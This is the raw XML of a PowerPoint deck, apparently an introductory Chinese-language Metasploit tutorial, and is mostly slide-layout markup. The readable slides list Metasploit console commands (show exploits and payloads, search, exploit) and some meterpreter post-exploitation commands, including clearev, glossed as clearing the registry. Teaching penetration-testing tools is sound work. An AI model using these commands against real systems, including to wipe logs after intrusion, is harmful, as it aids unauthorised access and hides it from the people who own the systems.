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68" r:id="rId4"/>
    <p:sldId id="304" r:id="rId5"/>
    <p:sldId id="305" r:id="rId6"/>
    <p:sldId id="306" r:id="rId7"/>
    <p:sldId id="283" r:id="rId8"/>
    <p:sldId id="284" r:id="rId9"/>
    <p:sldId id="293" r:id="rId10"/>
    <p:sldId id="272" r:id="rId11"/>
    <p:sldId id="288" r:id="rId12"/>
    <p:sldId id="281" r:id="rId13"/>
    <p:sldId id="276" r:id="rId14"/>
    <p:sldId id="278" r:id="rId15"/>
    <p:sldId id="280" r:id="rId16"/>
    <p:sldId id="277" r:id="rId17"/>
    <p:sldId id="263" r:id="rId18"/>
    <p:sldId id="295" r:id="rId19"/>
    <p:sldId id="294" r:id="rId20"/>
    <p:sldId id="275" r:id="rId21"/>
    <p:sldId id="296" r:id="rId22"/>
    <p:sldId id="297" r:id="rId23"/>
    <p:sldId id="300" r:id="rId24"/>
    <p:sldId id="267" r:id="rId25"/>
    <p:sldId id="302" r:id="rId26"/>
    <p:sldId id="303" r:id="rId27"/>
    <p:sldId id="301" r:id="rId28"/>
    <p:sldId id="310" r:id="rId29"/>
    <p:sldId id="286" r:id="rId30"/>
    <p:sldId id="308" r:id="rId31"/>
    <p:sldId id="309" r:id="rId32"/>
    <p:sldId id="270" r:id="rId33"/>
    <p:sldId id="269" r:id="rId34"/>
    <p:sldId id="311" r:id="rId35"/>
    <p:sldId id="262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 DAI" initials="YD" lastIdx="3" clrIdx="0">
    <p:extLst>
      <p:ext uri="{19B8F6BF-5375-455C-9EA6-DF929625EA0E}">
        <p15:presenceInfo xmlns:p15="http://schemas.microsoft.com/office/powerpoint/2012/main" userId="bde40d2395653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8T20:49:47.315" idx="2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19T10:21:44.149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EF6-600D-4A30-ADF6-3C724CB45E3B}" type="datetimeFigureOut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B769-EA29-45FE-903B-CF2C69C1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984816-17E8-4804-BD73-DA063AE4C8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58C1247A-E364-4EC7-8FB0-FB41E02D4C18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225550"/>
            <a:ext cx="4783138" cy="4745038"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 1670 w 2447"/>
              <a:gd name="T1" fmla="*/ 936 h 2431"/>
              <a:gd name="T2" fmla="*/ 1589 w 2447"/>
              <a:gd name="T3" fmla="*/ 956 h 2431"/>
              <a:gd name="T4" fmla="*/ 1552 w 2447"/>
              <a:gd name="T5" fmla="*/ 929 h 2431"/>
              <a:gd name="T6" fmla="*/ 1551 w 2447"/>
              <a:gd name="T7" fmla="*/ 928 h 2431"/>
              <a:gd name="T8" fmla="*/ 1423 w 2447"/>
              <a:gd name="T9" fmla="*/ 928 h 2431"/>
              <a:gd name="T10" fmla="*/ 1311 w 2447"/>
              <a:gd name="T11" fmla="*/ 1040 h 2431"/>
              <a:gd name="T12" fmla="*/ 1184 w 2447"/>
              <a:gd name="T13" fmla="*/ 1040 h 2431"/>
              <a:gd name="T14" fmla="*/ 1184 w 2447"/>
              <a:gd name="T15" fmla="*/ 912 h 2431"/>
              <a:gd name="T16" fmla="*/ 1551 w 2447"/>
              <a:gd name="T17" fmla="*/ 546 h 2431"/>
              <a:gd name="T18" fmla="*/ 1555 w 2447"/>
              <a:gd name="T19" fmla="*/ 423 h 2431"/>
              <a:gd name="T20" fmla="*/ 1555 w 2447"/>
              <a:gd name="T21" fmla="*/ 423 h 2431"/>
              <a:gd name="T22" fmla="*/ 1524 w 2447"/>
              <a:gd name="T23" fmla="*/ 380 h 2431"/>
              <a:gd name="T24" fmla="*/ 1543 w 2447"/>
              <a:gd name="T25" fmla="*/ 298 h 2431"/>
              <a:gd name="T26" fmla="*/ 1678 w 2447"/>
              <a:gd name="T27" fmla="*/ 163 h 2431"/>
              <a:gd name="T28" fmla="*/ 1678 w 2447"/>
              <a:gd name="T29" fmla="*/ 35 h 2431"/>
              <a:gd name="T30" fmla="*/ 1551 w 2447"/>
              <a:gd name="T31" fmla="*/ 35 h 2431"/>
              <a:gd name="T32" fmla="*/ 1463 w 2447"/>
              <a:gd name="T33" fmla="*/ 123 h 2431"/>
              <a:gd name="T34" fmla="*/ 1381 w 2447"/>
              <a:gd name="T35" fmla="*/ 143 h 2431"/>
              <a:gd name="T36" fmla="*/ 1348 w 2447"/>
              <a:gd name="T37" fmla="*/ 120 h 2431"/>
              <a:gd name="T38" fmla="*/ 1343 w 2447"/>
              <a:gd name="T39" fmla="*/ 115 h 2431"/>
              <a:gd name="T40" fmla="*/ 1216 w 2447"/>
              <a:gd name="T41" fmla="*/ 115 h 2431"/>
              <a:gd name="T42" fmla="*/ 35 w 2447"/>
              <a:gd name="T43" fmla="*/ 1295 h 2431"/>
              <a:gd name="T44" fmla="*/ 35 w 2447"/>
              <a:gd name="T45" fmla="*/ 1423 h 2431"/>
              <a:gd name="T46" fmla="*/ 163 w 2447"/>
              <a:gd name="T47" fmla="*/ 1423 h 2431"/>
              <a:gd name="T48" fmla="*/ 267 w 2447"/>
              <a:gd name="T49" fmla="*/ 1319 h 2431"/>
              <a:gd name="T50" fmla="*/ 394 w 2447"/>
              <a:gd name="T51" fmla="*/ 1319 h 2431"/>
              <a:gd name="T52" fmla="*/ 394 w 2447"/>
              <a:gd name="T53" fmla="*/ 1447 h 2431"/>
              <a:gd name="T54" fmla="*/ 179 w 2447"/>
              <a:gd name="T55" fmla="*/ 1662 h 2431"/>
              <a:gd name="T56" fmla="*/ 179 w 2447"/>
              <a:gd name="T57" fmla="*/ 1790 h 2431"/>
              <a:gd name="T58" fmla="*/ 306 w 2447"/>
              <a:gd name="T59" fmla="*/ 1790 h 2431"/>
              <a:gd name="T60" fmla="*/ 498 w 2447"/>
              <a:gd name="T61" fmla="*/ 1598 h 2431"/>
              <a:gd name="T62" fmla="*/ 625 w 2447"/>
              <a:gd name="T63" fmla="*/ 1598 h 2431"/>
              <a:gd name="T64" fmla="*/ 625 w 2447"/>
              <a:gd name="T65" fmla="*/ 1726 h 2431"/>
              <a:gd name="T66" fmla="*/ 179 w 2447"/>
              <a:gd name="T67" fmla="*/ 2173 h 2431"/>
              <a:gd name="T68" fmla="*/ 179 w 2447"/>
              <a:gd name="T69" fmla="*/ 2300 h 2431"/>
              <a:gd name="T70" fmla="*/ 306 w 2447"/>
              <a:gd name="T71" fmla="*/ 2300 h 2431"/>
              <a:gd name="T72" fmla="*/ 673 w 2447"/>
              <a:gd name="T73" fmla="*/ 1933 h 2431"/>
              <a:gd name="T74" fmla="*/ 801 w 2447"/>
              <a:gd name="T75" fmla="*/ 1933 h 2431"/>
              <a:gd name="T76" fmla="*/ 801 w 2447"/>
              <a:gd name="T77" fmla="*/ 2061 h 2431"/>
              <a:gd name="T78" fmla="*/ 815 w 2447"/>
              <a:gd name="T79" fmla="*/ 2047 h 2431"/>
              <a:gd name="T80" fmla="*/ 815 w 2447"/>
              <a:gd name="T81" fmla="*/ 2174 h 2431"/>
              <a:gd name="T82" fmla="*/ 943 w 2447"/>
              <a:gd name="T83" fmla="*/ 2174 h 2431"/>
              <a:gd name="T84" fmla="*/ 968 w 2447"/>
              <a:gd name="T85" fmla="*/ 2149 h 2431"/>
              <a:gd name="T86" fmla="*/ 1096 w 2447"/>
              <a:gd name="T87" fmla="*/ 2149 h 2431"/>
              <a:gd name="T88" fmla="*/ 1096 w 2447"/>
              <a:gd name="T89" fmla="*/ 2276 h 2431"/>
              <a:gd name="T90" fmla="*/ 1104 w 2447"/>
              <a:gd name="T91" fmla="*/ 2268 h 2431"/>
              <a:gd name="T92" fmla="*/ 1104 w 2447"/>
              <a:gd name="T93" fmla="*/ 2396 h 2431"/>
              <a:gd name="T94" fmla="*/ 1232 w 2447"/>
              <a:gd name="T95" fmla="*/ 2396 h 2431"/>
              <a:gd name="T96" fmla="*/ 2412 w 2447"/>
              <a:gd name="T97" fmla="*/ 1216 h 2431"/>
              <a:gd name="T98" fmla="*/ 2412 w 2447"/>
              <a:gd name="T99" fmla="*/ 1088 h 2431"/>
              <a:gd name="T100" fmla="*/ 2285 w 2447"/>
              <a:gd name="T101" fmla="*/ 1088 h 2431"/>
              <a:gd name="T102" fmla="*/ 2253 w 2447"/>
              <a:gd name="T103" fmla="*/ 1120 h 2431"/>
              <a:gd name="T104" fmla="*/ 2125 w 2447"/>
              <a:gd name="T105" fmla="*/ 1120 h 2431"/>
              <a:gd name="T106" fmla="*/ 2125 w 2447"/>
              <a:gd name="T107" fmla="*/ 992 h 2431"/>
              <a:gd name="T108" fmla="*/ 2334 w 2447"/>
              <a:gd name="T109" fmla="*/ 783 h 2431"/>
              <a:gd name="T110" fmla="*/ 2334 w 2447"/>
              <a:gd name="T111" fmla="*/ 655 h 2431"/>
              <a:gd name="T112" fmla="*/ 2207 w 2447"/>
              <a:gd name="T113" fmla="*/ 655 h 2431"/>
              <a:gd name="T114" fmla="*/ 2196 w 2447"/>
              <a:gd name="T115" fmla="*/ 666 h 2431"/>
              <a:gd name="T116" fmla="*/ 2124 w 2447"/>
              <a:gd name="T117" fmla="*/ 678 h 2431"/>
              <a:gd name="T118" fmla="*/ 2088 w 2447"/>
              <a:gd name="T119" fmla="*/ 653 h 2431"/>
              <a:gd name="T120" fmla="*/ 2085 w 2447"/>
              <a:gd name="T121" fmla="*/ 649 h 2431"/>
              <a:gd name="T122" fmla="*/ 1957 w 2447"/>
              <a:gd name="T123" fmla="*/ 649 h 2431"/>
              <a:gd name="T124" fmla="*/ 1670 w 2447"/>
              <a:gd name="T125" fmla="*/ 936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1">
                <a:moveTo>
                  <a:pt x="1670" y="936"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="1635" y="969"/>
                  <a:pt x="1604" y="963"/>
                  <a:pt x="1589" y="956"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1570" y="947"/>
                  <a:pt x="1565" y="941"/>
                  <a:pt x="1552" y="929"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1551" y="929"/>
                  <a:pt x="1551" y="929"/>
                  <a:pt x="1551" y="928"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1515" y="893"/>
                  <a:pt x="1458" y="893"/>
                  <a:pt x="1423" y="928"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1311" y="1040"/>
                  <a:pt x="1311" y="1040"/>
                  <a:pt x="1311" y="1040"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1276" y="1075"/>
                  <a:pt x="1219" y="1075"/>
                  <a:pt x="1184" y="1040"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1149" y="1005"/>
                  <a:pt x="1149" y="948"/>
                  <a:pt x="1184" y="912"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1551" y="546"/>
                  <a:pt x="1551" y="546"/>
                  <a:pt x="1551" y="546"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1584" y="512"/>
                  <a:pt x="1586" y="458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5"/>
                  <a:pt x="1533" y="401"/>
                  <a:pt x="1524" y="380"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1517" y="364"/>
                  <a:pt x="1510" y="333"/>
                  <a:pt x="1543" y="298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4" y="127"/>
                  <a:pt x="1714" y="70"/>
                  <a:pt x="1678" y="35"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1643" y="0"/>
                  <a:pt x="1586" y="0"/>
                  <a:pt x="1551" y="35"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1463" y="123"/>
                  <a:pt x="1463" y="123"/>
                  <a:pt x="1463" y="123"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1427" y="156"/>
                  <a:pt x="1396" y="149"/>
                  <a:pt x="1381" y="143"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1364" y="135"/>
                  <a:pt x="1358" y="130"/>
                  <a:pt x="1348" y="120"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1347" y="118"/>
                  <a:pt x="1345" y="117"/>
                  <a:pt x="1343" y="115"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1308" y="80"/>
                  <a:pt x="1251" y="80"/>
                  <a:pt x="1216" y="115"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="35" y="1295"/>
                  <a:pt x="35" y="1295"/>
                  <a:pt x="35" y="1295"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="1331"/>
                  <a:pt x="0" y="1388"/>
                  <a:pt x="35" y="1423"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="70" y="1458"/>
                  <a:pt x="128" y="1458"/>
                  <a:pt x="163" y="1423"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="267" y="1319"/>
                  <a:pt x="267" y="1319"/>
                  <a:pt x="267" y="1319"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="302" y="1284"/>
                  <a:pt x="359" y="1284"/>
                  <a:pt x="394" y="1319"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="429" y="1354"/>
                  <a:pt x="429" y="1412"/>
                  <a:pt x="394" y="1447"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="179" y="1662"/>
                  <a:pt x="179" y="1662"/>
                  <a:pt x="179" y="1662"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="144" y="1697"/>
                  <a:pt x="144" y="1755"/>
                  <a:pt x="179" y="1790"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="214" y="1825"/>
                  <a:pt x="271" y="1825"/>
                  <a:pt x="306" y="1790"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="498" y="1598"/>
                  <a:pt x="498" y="1598"/>
                  <a:pt x="498" y="1598"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="533" y="1563"/>
                  <a:pt x="590" y="1563"/>
                  <a:pt x="625" y="1598"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="661" y="1634"/>
                  <a:pt x="661" y="1691"/>
                  <a:pt x="625" y="1726"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="179" y="2173"/>
                  <a:pt x="179" y="2173"/>
                  <a:pt x="179" y="2173"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="144" y="2208"/>
                  <a:pt x="144" y="2265"/>
                  <a:pt x="179" y="2300"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="214" y="2336"/>
                  <a:pt x="271" y="2336"/>
                  <a:pt x="306" y="2300"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="673" y="1933"/>
                  <a:pt x="673" y="1933"/>
                  <a:pt x="673" y="1933"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="709" y="1898"/>
                  <a:pt x="766" y="1898"/>
                  <a:pt x="801" y="1933"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="836" y="1969"/>
                  <a:pt x="836" y="2026"/>
                  <a:pt x="801" y="2061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80" y="2082"/>
                  <a:pt x="780" y="2139"/>
                  <a:pt x="815" y="2174"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="850" y="2210"/>
                  <a:pt x="907" y="2210"/>
                  <a:pt x="943" y="2174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4" y="2113"/>
                  <a:pt x="1061" y="2113"/>
                  <a:pt x="1096" y="2149"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1131" y="2184"/>
                  <a:pt x="1131" y="2241"/>
                  <a:pt x="1096" y="2276"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1104" y="2268"/>
                  <a:pt x="1104" y="2268"/>
                  <a:pt x="1104" y="2268"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1069" y="2304"/>
                  <a:pt x="1069" y="2361"/>
                  <a:pt x="1104" y="2396"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1139" y="2431"/>
                  <a:pt x="1196" y="2431"/>
                  <a:pt x="1232" y="2396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0"/>
                  <a:pt x="2447" y="1123"/>
                  <a:pt x="2412" y="1088"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2377" y="1053"/>
                  <a:pt x="2320" y="1053"/>
                  <a:pt x="2285" y="1088"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2253" y="1120"/>
                  <a:pt x="2253" y="1120"/>
                  <a:pt x="2253" y="1120"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2217" y="1155"/>
                  <a:pt x="2160" y="1155"/>
                  <a:pt x="2125" y="1120"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2090" y="1085"/>
                  <a:pt x="2090" y="1027"/>
                  <a:pt x="2125" y="992"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2334" y="783"/>
                  <a:pt x="2334" y="783"/>
                  <a:pt x="2334" y="783"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2369" y="748"/>
                  <a:pt x="2369" y="691"/>
                  <a:pt x="2334" y="655"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2299" y="620"/>
                  <a:pt x="2242" y="620"/>
                  <a:pt x="2207" y="655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5" y="690"/>
                  <a:pt x="2138" y="684"/>
                  <a:pt x="2124" y="678"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2106" y="669"/>
                  <a:pt x="2100" y="664"/>
                  <a:pt x="2088" y="653"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2087" y="651"/>
                  <a:pt x="2086" y="650"/>
                  <a:pt x="2085" y="649"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2050" y="614"/>
                  <a:pt x="1993" y="614"/>
                  <a:pt x="1957" y="649"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1670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EC03C70-F70E-4D97-86EC-1F02519F7D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5722" y="1947863"/>
            <a:ext cx="8808806" cy="285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88ADCC0A-75EF-4963-A396-C8DEFC1397B9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8924925" y="1189038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A3978EE-87B3-408D-A91B-D0A36FF639A4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4156075" y="5248275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D1222072-1F11-445C-8937-1B50AC4A2A36}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6489700" y="1217613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EAEFBC92-8563-4268-A0D7-DACDB774E884}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7683500" y="1422400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44D3A99D-36E0-4BEF-B798-01AA6A81508C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4030663" y="1473200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44BC6767-1009-4621-B230-D913B56BD39F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6821488" y="4119563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7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6308575C-F1D0-446B-943D-7C46D816CC00}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6689725" y="898525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F1587AEF-CE98-4A41-B4D6-242FDBC23ECD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7896225" y="887413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7EC34812-4101-42F9-8358-59FBD347197D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6465888" y="5314950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79324" y="2779088"/>
            <a:ext cx="64333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79325" y="3350531"/>
            <a:ext cx="6433352" cy="767764"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr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5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{74A87E4A-B01F-4BC2-B340-8A24699EDB0F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E885489-9BD7-446D-9889-5F82F2820A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24075"/>
            <a:ext cx="12192000" cy="28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94446" y="276088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94446" y="354704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2B53D691-F2F0-49F5-A5EC-68BA8E86BB44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08584396-C829-48F3-B33C-D10826D5833C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AF940197-18E6-4C04-8B36-34A79B8755E9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E6D56BD4-8D6F-4FD6-8011-C645F2C8D445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4F77CF0-1458-4140-9E61-44D7565420D0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94F5964F-1AF9-4361-AF40-A99A57E074E2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20353C5A-4588-40B0-AD2F-12E283A09BB4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9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DC39E1E7-6B77-4D48-B3EA-2454E52CE088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2017/11/19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09FD6D3-F58D-4502-91D9-C9DE4D6CDB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EFDF74EB-32AA-439C-9999-86819FE47842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C76BA4D0-28E0-4AC8-A86C-658BF159CC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60738" y="2124075"/>
            <a:ext cx="8670524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3C4363A1-C1FE-40B7-BD43-45B6CBBBE595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86B181C0-4937-4DB9-8B38-67E2C309E548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2B18A7D9-FF2E-40E9-BF5F-770D72B42844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F15C4BF0-1DE8-41FC-8F76-F95C5917F000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65ED36B1-BA23-4A34-946C-BFED841AF9F7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1F8D3AE9-BF87-4579-BBC3-889D88549D9F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DA206DA9-9744-4A14-A1E0-0028AB469800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3C5076B3-79BF-4B73-96FC-6FA82025D587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283801" y="2906712"/>
            <a:ext cx="3624399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01" y="384495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283801" y="416058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t>2017/6/19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2017/11/19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ohux.com:3000/web_vulu/metasploit/src/master/metasploit-command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www.offensive-security.com/metasploit-unleashed/filesystem-and-librarie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15744" y="3540202"/>
            <a:ext cx="5160513" cy="7677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 b="0"/>
              <a:t>Metasploit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" b="0"/>
              <a:t>讲解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4B31A-2272-4C11-9D3D-82E621C7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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>基础使用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38E64C-C28C-4CE1-A422-39542A01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0E1C09-6AB2-4B37-B970-71E50EC3F57F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="669924" y="2165684"/>
            <a:ext cx="107360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show –h    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>多用帮助</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>show auxiliary  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>显示辅助模块</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>show exploit  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>显示渗透攻击模块</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>show payloads </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>显示攻击载荷模块</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>show encoders  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>显示编码器模块</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>show options  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>显示选项</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>show targets  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>显示目标信息</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>show advanced </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>显示高级选项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search</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>搜索漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>exploit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>执行攻击</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>load module </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>载入模块</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>info exp </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>exp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>信息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7D56A4-92F7-4B12-9E75-E2A38B04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761" y="3229623"/>
            <a:ext cx="2657143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A5CEB-00DC-4660-A349-6BAD9D71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meterpreter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24567-F193-4A43-9A47-CF42F1F7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431C8F-C4D6-441A-AA19-0DC57DCF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256361"/>
            <a:ext cx="5314286" cy="942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BE1837-CC04-43E9-9FB6-BBAD456CCAF8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="542333" y="2285999"/>
            <a:ext cx="10143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cat  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>查看文件</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>pwd </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>显示路径</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>clearev </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>清理注册表</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
